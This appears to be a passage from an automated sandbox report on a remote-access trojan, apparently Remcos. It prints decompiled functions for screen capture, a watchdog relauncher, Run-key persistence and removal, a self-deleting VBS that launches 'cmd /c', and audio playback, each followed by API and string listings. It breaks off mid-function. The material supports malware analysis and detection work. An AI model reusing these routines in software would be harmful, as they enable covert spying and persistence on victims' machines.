                      				intOrPtr _v54;
                      				char _v56;
                      				char _v80;
                      				intOrPtr _v84;
                      				struct tagCURSORINFO _v100;
                      				signed int _v106;
                      				signed int _v108;
                      				long _v116;
                      				long _v120;
                      				char _v124;
                      				struct _ICONINFO _v144;
                      				char _v168;
                      				void* __ebx;
                      				int _t114;
                      				void* _t115;
                      				void* _t116;
                      				void* _t120;
                      				int _t127;
                      				void* _t128;
                      				signed char _t140;
                      				long _t146;
                      				void* _t147;
                      				int _t149;
                      				void* _t157;
                      				void* _t186;
                      				void* _t188;
                      				void* _t194;
                      				int _t199;
                      				void* _t204;
                      				void* _t223;
                      				signed int _t226;
                      				struct HDC__* _t228;
                      				struct HDC__* _t232;
                      				struct tagBITMAPINFO* _t234;
                      				void* _t235;
                      				int _t241;
                      
                      				_v13 = __edx;
                      				_t194 = __ecx;
                      				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
                      				_v20 = _t232;
                      				_t228 = CreateCompatibleDC(_t232);
                      				_v40 = _t228;
                      				_v32 = E00754D3D( *((intOrPtr*)(0x7abd78 + _a4 * 4)));
                      				_t114 = E00754D89( *((intOrPtr*)(0x7abd78 + _a4 * 4)));
                      				_t199 = _v32;
                      				_v36 = _t114;
                      				if(_t199 != 0 || _t114 != 0) {
                      					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
                      					_v12 = _t115;
                      					__eflags = _t115;
                      					if(_t115 != 0) {
                      						_t116 = SelectObject(_t228, _t115);
                      						__eflags = _t116;
                      						if(_t116 != 0) {
                      							_v28 = _v28 & 0x00000000;
                      							_v24 = _v24 & 0x00000000;
                      							E00754DCA( *((intOrPtr*)(0x7abd78 + _a4 * 4)),  &_v28);
                      							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
                      							__eflags = _t120;
                      							if(_t120 == 0) {
                      								goto L7;
                      							}
                      							__eflags = _v13;
                      							if(_v13 != 0) {
                      								_v100.cbSize = 0x14;
                      								_t186 = GetCursorInfo( &_v100);
                      								__eflags = _t186;
                      								if(_t186 != 0) {
                      									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
                      									__eflags = _t188;
                      									if(_t188 != 0) {
                      										_t241 = _v84 - _v144.yHotspot - _v24;
                      										__eflags = _t241;
                      										DeleteObject(_v144.hbmColor);
                      										DeleteObject(_v144.hbmMask);
                      										_t228 = _v40;
                      										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
                      										_t232 = _v20;
                      									}
                      								}
                      							}
                      							_push( &_v124);
                      							_t127 = 0x18;
                      							_t128 = GetObjectA(_v12, _t127, ??);
                      							__eflags = _t128;
                      							if(_t128 == 0) {
                      								goto L7;
                      							} else {
                      								_t226 = _v106 * _v108 & 0x0000ffff;
                      								__eflags = _t226 - 1;
                      								if(_t226 != 1) {
                      									_push(4);
                      									_pop(1);
                      									_a4 = 1;
                      									__eflags = _t226 - 1;
                      									if(_t226 <= 1) {
                      										L24:
                      										__eflags = 1 << 1;
                      										_push(0x2eb6edc);
                      										L25:
                      										_t234 = LocalAlloc(0x40, ??);
                      										_t204 = 0x18;
                      										_t234->bmiHeader = 0x28;
                      										_t234->bmiHeader.biWidth = _v120;
                      										_t234->bmiHeader.biHeight = _v116;
                      										_t234->bmiHeader.biPlanes = _v108;
                      										_t234->bmiHeader.biBitCount = _v106;
                      										_t140 = _a4;
                      										__eflags = _t140 - _t204;
                      										if(_t140 < _t204) {
                      											__eflags = 1;
                      											_t234->bmiHeader.biClrUsed = 1 << _t140;
                      										}
                      										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
                      										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
                      										asm("cdq");
                      										_t227 = _t226 & 0x00000007;
                      										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
                      										_t234->bmiHeader.biSizeImage = _t146;
                      										_t147 = GlobalAlloc(0, _t146);
                      										_a4 = _t147;
                      										__eflags = _t147;
                      										if(_t147 != 0) {
                      											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
                      											__eflags = _t149;
                      											if(_t149 != 0) {
                      												_v56 = 0x4d42;
                      												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                      												_v50 = 0;
                      												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                      												__eflags = _t157;
                      												_v46 = _t157;
                      												E007420D5(_t194,  &_v80);
                      												E007420D5(_t194,  &_v168);
                      												E0074251D(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
                      												E00743436( &_v80);
                      												E0074251D(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
                      												E00743436( &_v80);
                      												_t235 = _a4;
                      												E0074251D(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
                      												E00743436( &_v80);
                      												DeleteObject(_v12);
                      												GlobalFree(_t235);
                      												DeleteDC(_v20);
                      												DeleteDC(_t228);
                      												E00742044(_t194, _t194, __eflags,  &_v168);
                      												E00741FC7();
                      												E00741FC7();
                      												goto L32;
                      											}
                      											DeleteDC(_v20);
                      											DeleteDC(_t228);
                      											DeleteObject(_v12);
                      											GlobalFree(_a4);
                      											goto L2;
                      										} else {
                      											_push(_v20);
                      											L8:
                      											DeleteDC();
                      											DeleteDC(_t228);
                      											_push(_v12);
                      											goto L5;
                      										}
                      									}
                      									_push(8);
                      									_pop(1);
                      									_a4 = 1;
                      									__eflags = _t226 - 1;
                      									if(_t226 <= 1) {
                      										goto L24;
                      									}
                      									_push(0x10);
                      									_pop(1);
                      									_a4 = 1;
                      									__eflags = _t226 - 1;
                      									if(_t226 <= 1) {
                      										goto L24;
                      									}
                      									_t223 = 0x18;
                      									__eflags = _t226 - _t223;
                      									if(_t226 > _t223) {
                      										_push(0x20);
                      										_pop(1);
                      										L23:
                      										_a4 = 1;
                      										goto L24;
                      									}
                      									_a4 = _t223;
                      									_push(0x28);
                      									goto L25;
                      								}
                      								goto L23;
                      							}
                      						}
                      						L7:
                      						_push(_t232);
                      						goto L8;
                      					} else {
                      						DeleteDC(_t232);
                      						DeleteDC(_t228);
                      						_push(0);
                      						L5:
                      						DeleteObject();
                      						goto L2;
                      					}
                      				} else {
                      					L2:
                      					E00742084(_t194, _t194, 0x79f6bc);
                      					L32:
                      					return _t194;
                      				}
                      			}

                      APIs
                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00754921
                      • CreateCompatibleDC.GDI32(00000000), ref: 0075492D
                      • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0075497B
                      • DeleteDC.GDI32(00000000), ref: 0075498F
                      • DeleteDC.GDI32(00000000), ref: 00754992
                      • DeleteObject.GDI32(?), ref: 00754996
                      • SelectObject.GDI32(00000000,00000000), ref: 007549A0
                      • DeleteDC.GDI32(00000000), ref: 007549B1
                      • DeleteDC.GDI32(00000000), ref: 007549B4
                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 007549F0
                      • GetCursorInfo.USER32(?,?,?), ref: 00754A0B
                      • GetIconInfo.USER32(?,?), ref: 00754A1F
                      • DeleteObject.GDI32(?), ref: 00754A44
                      • DeleteObject.GDI32(?), ref: 00754A4D
                      • DrawIcon.USER32 ref: 00754A5C
                      • GetObjectA.GDI32(?,00000018,?), ref: 00754A70
                      • LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 00754AD6
                      • GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 00754B3F
                      • GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00754B63
                      • DeleteDC.GDI32(?), ref: 00754B76
                      • DeleteDC.GDI32(00000000), ref: 00754B79
                      • DeleteObject.GDI32(?), ref: 00754B7E
                      • GlobalFree.KERNEL32 ref: 00754B88
                      • DeleteObject.GDI32(?), ref: 00754C2D
                      • GlobalFree.KERNEL32 ref: 00754C34
                      • DeleteDC.GDI32(?), ref: 00754C43
                      • DeleteDC.GDI32(00000000), ref: 00754C46
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDrawLocalSelectStretch
                      • String ID: DISPLAY
                      • API String ID: 860969378-865373369
                      • Opcode ID: dbd2de994c0bc447076c6b3c4a171912ab51a5890fb13a376b522a7a4a100237
                      • Instruction ID: 9a363d0a9136574dfcc8db25d75590e4abca0ae94af5964accf60aa28cbb6a78
                      • Opcode Fuzzy Hash: dbd2de994c0bc447076c6b3c4a171912ab51a5890fb13a376b522a7a4a100237
                      • Instruction Fuzzy Hash: 8DB15075A00219EFDB20DFA4DC49BEEBBB9EF44315F00801AF945E7250DB78AA85CB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E0074FD95() {
                      				long _v8;
                      				char _v32;
                      				short _v556;
                      				short _v1076;
                      				short _v1596;
                      				short _v2116;
                      				void* _t27;
                      				void* _t28;
                      				void* _t31;
                      				long _t37;
                      				int _t41;
                      				long _t50;
                      				void* _t55;
                      				void* _t68;
                      				void* _t70;
                      				int _t71;
                      				void* _t72;
                      				long _t73;
                      				void* _t110;
                      				void* _t112;
                      				void* _t115;
                      				void* _t116;
                      
                      				_t71 = 0;
                      				_v8 = _t73;
                      				CreateMutexA(0, 1, "Mutex_RemWatchdog");
                      				GetModuleFileNameW(0,  &_v2116, 0x104);
                      				_t27 = E00742489();
                      				_t28 = E00741F95(0x7ac560);
                      				_t108 = 0x7ac518;
                      				_t31 = E00750A30(E00741F95(0x7ac518), "exepath",  &_v556, 0x208, _t28, _t27);
                      				_t116 = _t115 + 0x14;
                      				if(_t31 != 0) {
                      					E007420D5(0,  &_v32);
                      					if(E007579DC( &_v556,  &_v32) == 0) {
                      						goto L1;
                      					}
                      					_t110 = OpenProcess(0x100000, 0, _v8);
                      					WaitForSingleObject(_t110, 0xffffffff);
                      					CloseHandle(_t110);
                      					_t37 = GetCurrentProcessId();
                      					if(E00750BB0(0x7ac518, E00741F95(0x7ac518), "WDH", _t37) == 0) {
                      						L18:
                      						_push(1);
                      						L2:
                      						ExitProcess();
                      					}
                      					_t108 = ShellExecuteW;
                      					do {
                      						_t41 = PathFileExistsW( &_v556);
                      						_t42 =  &_v556;
                      						if(_t41 != 0) {
                      							L11:
                      							ShellExecuteW(_t71, L"open", _t42, _t71, _t71, 1);
                      							L12:
                      							do {
                      								_t72 = E00750885(E00741F95(0x7ac518), "WD",  &_v8);
                      								_t122 = _t72;
                      								if(_t72 == 0) {
                      									Sleep(0x1f4);
                      								} else {
                      									E00750CE2(E00741F95(0x7ac518), _t122, "WD");
                      								}
                      							} while (_t72 == 0);
                      							goto L17;
                      						}
                      						_t55 = E00742489();
                      						if(E00757947(E00741F95( &_v32), _t55,  &_v556, _t71) == 0) {
                      							E00771F00(_t108,  &_v1596, _t71, 0x208);
                      							_t116 = _t116 + 0xc;
                      							GetTempPathW(0x104,  &_v1596);
                      							GetTempFileNameW( &_v1596, L"temp_", _t71,  &_v1076);
                      							lstrcatW( &_v1076, L".exe");
                      							_t68 = E00742489();
                      							_t70 = E00757947(E00741F95( &_v32), _t68,  &_v1076, _t71);
                      							__eflags = _t70;
                      							if(_t70 == 0) {
                      								goto L12;
                      							}
                      							_t42 =  &_v1076;
                      							goto L11;
                      						}
                      						_t42 =  &_v556;
                      						goto L11;
                      						L17:
                      						_t71 = 0;
                      						_t112 = OpenProcess(0x100000, 0, _v8);
                      						WaitForSingleObject(_t112, 0xffffffff);
                      						CloseHandle(_t112);
                      						_t50 = GetCurrentProcessId();
                      					} while (E00750BB0(0x7ac518, E00741F95(0x7ac518), "WDH", _t50) != 0);
                      					goto L18;
                      				}
                      				L1:
                      				_push(_t71);
                      				goto L2;
                      			}

                      APIs
                      • CreateMutexA.KERNEL32(00000000,00000001,Mutex_RemWatchdog,007AC578,007AC518,00000000), ref: 0074FDAE
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0074FDC1
                        • Part of subcall function 00750A30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00750A4C
                        • Part of subcall function 00750A30: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00750A65
                        • Part of subcall function 00750A30: RegCloseKey.ADVAPI32(00000000), ref: 00750A70
                      • ExitProcess.KERNEL32 ref: 0074FE08
                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0074FE31
                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0074FE3C
                      • CloseHandle.KERNEL32(00000000), ref: 0074FE43
                      • GetCurrentProcessId.KERNEL32 ref: 0074FE49
                      • PathFileExistsW.SHLWAPI(?), ref: 0074FE7A
                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0074FF49
                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0074FF9F
                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0074FFAA
                      • CloseHandle.KERNEL32(00000000), ref: 0074FFB1
                      • GetCurrentProcessId.KERNEL32 ref: 0074FFB7
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Process$CloseOpen$CurrentFileHandleObjectSingleWait$CreateExecuteExistsExitModuleMutexNamePathQueryShellValue
                      • String ID: .exe$Mutex_RemWatchdog$WDH$exepath$open$temp_
                      • API String ID: 2645874385-232273909
                      • Opcode ID: 4975e7656595edf0ef9c60ff6f98d3017db3f31b53011896535aec837be6c319
                      • Instruction ID: 022975a7dba0406d7d16dc48fbc072f0ab66e72afc74ee7697c814ea8950c11d
                      • Opcode Fuzzy Hash: 4975e7656595edf0ef9c60ff6f98d3017db3f31b53011896535aec837be6c319
                      • Instruction Fuzzy Hash: DF51C371A00219AFDF00BBA09C4EEFE376DAB46310F504166F505A71D1EF7C9E4A8BA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E0074B0E2(char _a4) {
                      				char _v28;
                      				char _v52;
                      				char _v76;
                      				char _v100;
                      				char _v124;
                      				char _v148;
                      				char _v172;
                      				short _v692;
                      				void* __ebx;
                      				void* __edi;
                      				void* __ebp;
                      				void* _t53;
                      				void* _t54;
                      				void* _t57;
                      				signed int _t61;
                      				void* _t62;
                      				void* _t78;
                      				void* _t79;
                      				void* _t92;
                      				void* _t93;
                      				signed char _t134;
                      				void* _t243;
                      				void* _t245;
                      				void* _t246;
                      				void* _t247;
                      
                      				E0075015B();
                      				if( *0x7aa9d4 != 0x30) {
                      					E00749D73();
                      				}
                      				_t243 =  *0x7abd6b - 1; // 0x0
                      				if(_t243 == 0) {
                      					E0075537E(_t243);
                      				}
                      				if( *0x7aba75 != 0) {
                      					E00757754(E00741EEB(0x7ac0e0));
                      				}
                      				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                      				_t245 =  *0x7abb02 - 1; // 0x0
                      				if(_t245 == 0) {
                      					E00750D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00741EEB(0x7ac4e8));
                      				}
                      				_t246 =  *0x7abafb - 1; // 0x0
                      				if(_t246 == 0) {
                      					E00750D5C(0x80000002, _t231, E00741EEB(0x7ac4e8));
                      				}
                      				_t247 =  *0x7abb00 - 1; // 0x0
                      				if(_t247 == 0) {
                      					E00750D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00741EEB(0x7ac4e8));
                      				}
                      				_t53 = E00742489();
                      				_t54 = E00741F95(0x7ac560);
                      				_t57 = E00750A30(E00741F95(0x7ac518), "exepath",  &_v692, 0x208, _t54, _t53);
                      				_t248 = _t57;
                      				if(_t57 == 0) {
                      					GetModuleFileNameW(0,  &_v692, 0x208);
                      				}
                      				RegDeleteKeyA(0x80000001, E00741F95(0x7ac518));
                      				_t61 = SetFileAttributesW( &_v692, 0x80);
                      				_t140 = 0x7ac530;
                      				asm("sbb bl, bl");
                      				_t134 =  ~_t61 & 0x00000001;
                      				_t62 = E007474E4(_t248);
                      				_t249 = _t62;
                      				if(_t62 != 0) {
                      					_t140 = 0x7ac530;
                      					SetFileAttributesW(E00741EEB(0x7ac530), 0x80);
                      				}
                      				E007430A6(_t134,  &_v124, E0074427F(_t134,  &_v52, E0077987F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
                      				E00741EF0();
                      				E00744405(_t134,  &_v28, L"On Error Resume Next\n", _t249, E0074427F(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
                      				E00741EF0();
                      				_t250 = _t134;
                      				if(_t134 != 0) {
                      					E00743311(E007430A6(_t134,  &_v52, E00744405(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E0074427F(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
                      					E00741EF0();
                      					E00741EF0();
                      					E00741EF0();
                      				}
                      				E00743311(E007430A6(_t134,  &_v100, E007430A6(_t134,  &_v76, E0074427F(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				_t251 = _t134;
                      				if(_t134 != 0) {
                      					E0074766C(_t134,  &_v28, 0, L"wend\n");
                      				}
                      				_t78 = E007474E4(_t251);
                      				_t252 = _t78;
                      				if(_t78 != 0) {
                      					E00743311(E007430A6(0x79f724,  &_v100, E00749E69( &_v76, L"fso.DeleteFolder \"", _t252, 0x7ac530), 0, _t252, L"\"\n"));
                      					E00741EF0();
                      					E00741EF0();
                      				}
                      				_t79 = E0074427F(0x79f724,  &_v172, L"\"\"\", 0");
                      				E00743311(E007430A6(0x79f724,  &_v100, E00743030( &_v76, E00744429(0x79f724,  &_v52, E0074427F(0x79f724,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				E0074766C(0x79f724,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                      				_t92 = E00741EEB( &_v124);
                      				_t93 = E00742489();
                      				if(E00757947(E00741EEB( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", E00741EEB( &_v124), 0x79f724, 0x79f724, 0) > 0x20) {
                      					ExitProcess(0);
                      				}
                      				E00741EF0();
                      				E00741EF0();
                      				return E00741EF0();
                      			}


                      APIs
                        • Part of subcall function 0075015B: TerminateProcess.KERNEL32(00000000,?,0074AD95), ref: 0075016B
                        • Part of subcall function 0075015B: WaitForSingleObject.KERNEL32(000000FF,?,0074AD95), ref: 0075017E
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0074B1DB
                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0074B1EE
                      • SetFileAttributesW.KERNEL32(?,00000080), ref: 0074B206
                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0074B234
                        • Part of subcall function 00749D73: TerminateThread.KERNEL32(0074884B,00000000,?,0074ADA3), ref: 00749D82
                        • Part of subcall function 00749D73: UnhookWindowsHookEx.USER32(00000000), ref: 00749D92
                        • Part of subcall function 00749D73: TerminateThread.KERNEL32(Function_00008830,00000000,?,0074ADA3), ref: 00749DA4
                        • Part of subcall function 00757947: CreateFileW.KERNEL32(i]t,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,00757A71,00000000,00000000), ref: 00757986
                      • ShellExecuteW.SHELL32(00000000,open,00000000,0079F724,0079F724,00000000), ref: 0074B457
                      • ExitProcess.KERNEL32 ref: 0074B463
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                      • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                      • API String ID: 1861856835-1536747724
                      • Opcode ID: bf8044d5d29a65d4875f9d05cc11ca04355931a7d682a8c3dec1454324853079
                      • Instruction ID: 53218e54d2527aef75986eada7cdeb4aebb3d039f5cf2632850271296600d2f5
                      • Opcode Fuzzy Hash: bf8044d5d29a65d4875f9d05cc11ca04355931a7d682a8c3dec1454324853079
                      • Instruction Fuzzy Hash: 7D91A971A10118EBCB15F7A4DC6AEFF777AAF91300F804129F80667192DF6C5D8AC690
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 86%
                      			E007569CC(void* __ecx, void* __edx, char _a4) {
                      				char _v24;
                      				char _v28;
                      				char _v52;
                      				char _v76;
                      				char _v100;
                      				char _v124;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* _t25;
                      				void* _t28;
                      				void* _t43;
                      				void* _t60;
                      				void* _t63;
                      				void* _t67;
                      				CHAR* _t89;
                      				void* _t109;
                      				CHAR* _t110;
                      				void* _t111;
                      				void* _t114;
                      				void* _t118;
                      
                      				_t103 = __edx;
                      				_t67 = __ecx;
                      				_t109 = __edx;
                      				if(E00756C12( &_a4, __ecx, __ecx) == 0xffffffff) {
                      					_t63 = E00741EEB( &_a4);
                      					_t103 = 0x30;
                      					E00741EFA( &_a4, 0x30, _t111, E0075805B( &_v28, 0x30, _t63));
                      					E00741EF0();
                      				}
                      				_t25 = E00742489();
                      				_t120 = _t25;
                      				if(_t25 == 0) {
                      					__eflags = PathFileExistsW(E00741EEB( &_a4));
                      					if(__eflags != 0) {
                      						goto L4;
                      					} else {
                      						E00742084(_t67, _t114 - 0x18, 0x79f6bc);
                      						_push(0xa8);
                      						E00744AA4(_t67, 0x7aca18, _t103, __eflags);
                      					}
                      				} else {
                      					_t60 = E00741EEB( &_a4);
                      					_t118 = _t114 - 0x18;
                      					E007420EC(_t67, _t118, _t103, _t120, _t109);
                      					E00757A4E(_t60);
                      					_t114 = _t118 + 0x18;
                      					L4:
                      					_t28 = E007572DA( &_v124, _t67);
                      					_t108 = E00743030( &_v28, E007430A6(_t67,  &_v76, E00749E69( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
                      					E007430A6(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
                      					E00741EF0();
                      					E00741EF0();
                      					E00741EF0();
                      					E00741EF0();
                      					mciSendStringW(E00741EEB( &_v52), 0, 0, 0);
                      					mciSendStringA("play audio", 0, 0, 0);
                      					_t115 = _t114 - 0x18;
                      					E00742084(0, _t114 - 0x18, 0x79f6bc);
                      					_push(0xa9);
                      					E00744AA4(0, 0x7aca18, _t32, 0);
                      					_t43 = CreateEventA(0, 1, 0, 0);
                      					while(1) {
                      						L5:
                      						 *0x7abea8 = _t43;
                      						while(1) {
                      							_t122 = _t43;
                      							if(_t43 == 0) {
                      								break;
                      							}
                      							__eflags =  *0x7abea6; // 0x0
                      							if(__eflags != 0) {
                      								mciSendStringA("pause audio", 0, 0, 0);
                      								 *0x7abea6 = 0;
                      							}
                      							__eflags =  *0x7abea5; // 0x0
                      							if(__eflags != 0) {
                      								mciSendStringA("resume audio", 0, 0, 0);
                      								 *0x7abea5 = 0;
                      							}
                      							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
                      							_t108 =  &_v24;
                      							_t110 = "stopped";
                      							_t89 = 0;
                      							while(1) {
                      								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
                      								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
                      									break;
                      								}
                      								_t89 = _t89 + 1;
                      								__eflags = _t89 - 8;
                      								if(_t89 != 8) {
                      									continue;
                      								} else {
                      									SetEvent( *0x7abea8);
                      								}
                      								break;
                      							}
                      							__eflags = WaitForSingleObject( *0x7abea8, 0x1f4);
                      							if(__eflags != 0) {
                      								_t43 =  *0x7abea8; // 0x0
                      							} else {
                      								CloseHandle( *0x7abea8);
                      								_t43 = 0;
                      								goto L5;
                      							}
                      						}
                      						mciSendStringA("stop audio", 0, 0, 0);
                      						mciSendStringA("close audio", 0, 0, 0);
                      						E00742084(0, _t115 - 0x18, 0x79f6bc);
                      						_push(0xaa);
                      						E00744AA4(0, 0x7aca18, _t108, _t122);
                      						E00741EF0();
                      						goto L21;
                      					}
                      				}
                      				L21:
                      				return E00741EF0();
                      			}


                      APIs
                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00756AB1
                      • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00756AC5
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0079F6BC), ref: 00756AEA
                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,007AC238), ref: 00756B00
                      • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00756B41
                      • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00756B59
                      • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00756B6D
                      • SetEvent.KERNEL32 ref: 00756B8E
                      • WaitForSingleObject.KERNEL32(000001F4), ref: 00756B9F
                      • CloseHandle.KERNEL32 ref: 00756BAF
                      • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00756BD1
                      • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00756BDB
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                      • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                      • API String ID: 738084811-1354618412
                      • Opcode ID: 5089d407c54061359bb63dd672fc50e6cefd9697c0feef52b7da08893216e9b5
                      • Instruction ID: d3121763fc418875f3565d9e003a0ca0dafa382bd7b4803244f2ebf74a043534
                      • Opcode Fuzzy Hash: 5089d407c54061359bb63dd672fc50e6cefd9697c0feef52b7da08893216e9b5
                      • Instruction Fuzzy Hash: 8751C3B1704108BFDB14B774DC9ACFF3B6DDB91342B808229F902A7192DF6C4D4A86A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E0074AD84() {
                      				char _v28;
                      				char _v52;
                      				char _v76;
                      				char _v100;
                      				char _v124;
                      				char _v148;
                      				short _v668;
                      				void* _t49;
                      				void* _t50;
                      				void* _t53;
                      				void* _t56;
                      				void* _t82;
                      				void* _t84;
                      				void* _t85;
                      				signed char _t123;
                      				signed char _t124;
                      				void* _t227;
                      				void* _t229;
                      				void* _t230;
                      				void* _t231;
                      
                      				E0075015B();
                      				if( *0x7aa9d4 != 0x30) {
                      					E00749D73();
                      				}
                      				_t227 =  *0x7abd6b - 1; // 0x0
                      				if(_t227 == 0) {
                      					E0075537E(_t227);
                      				}
                      				if( *0x7aba75 != 0) {
                      					E00757754(E00741EEB(0x7ac0e0));
                      				}
                      				_t214 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                      				_t229 =  *0x7abb02 - 1; // 0x0
                      				if(_t229 == 0) {
                      					E00750D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00741EEB(0x7ac4e8));
                      				}
                      				_t230 =  *0x7abafb - 1; // 0x0
                      				if(_t230 == 0) {
                      					E00750D5C(0x80000002, _t214, E00741EEB(0x7ac4e8));
                      				}
                      				_t231 =  *0x7abb00 - 1; // 0x0
                      				if(_t231 == 0) {
                      					E00750D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00741EEB(0x7ac4e8));
                      				}
                      				E00771F00(0,  &_v668, 0, 0x208);
                      				_t49 = E00742489();
                      				_t50 = E00741F95(0x7ac560);
                      				_t53 = E00750A30(E00741F95(0x7ac518), "exepath",  &_v668, 0x208, _t50, _t49);
                      				_t232 = _t53;
                      				if(_t53 == 0) {
                      					GetModuleFileNameW(0,  &_v668, 0x208);
                      				}
                      				RegDeleteKeyA(0x80000001, E00741F95(0x7ac518));
                      				_t56 = E007474E4(_t232);
                      				_t233 = _t56;
                      				if(_t56 != 0) {
                      					SetFileAttributesW(E00741EEB(0x7ac530), 0x80);
                      				}
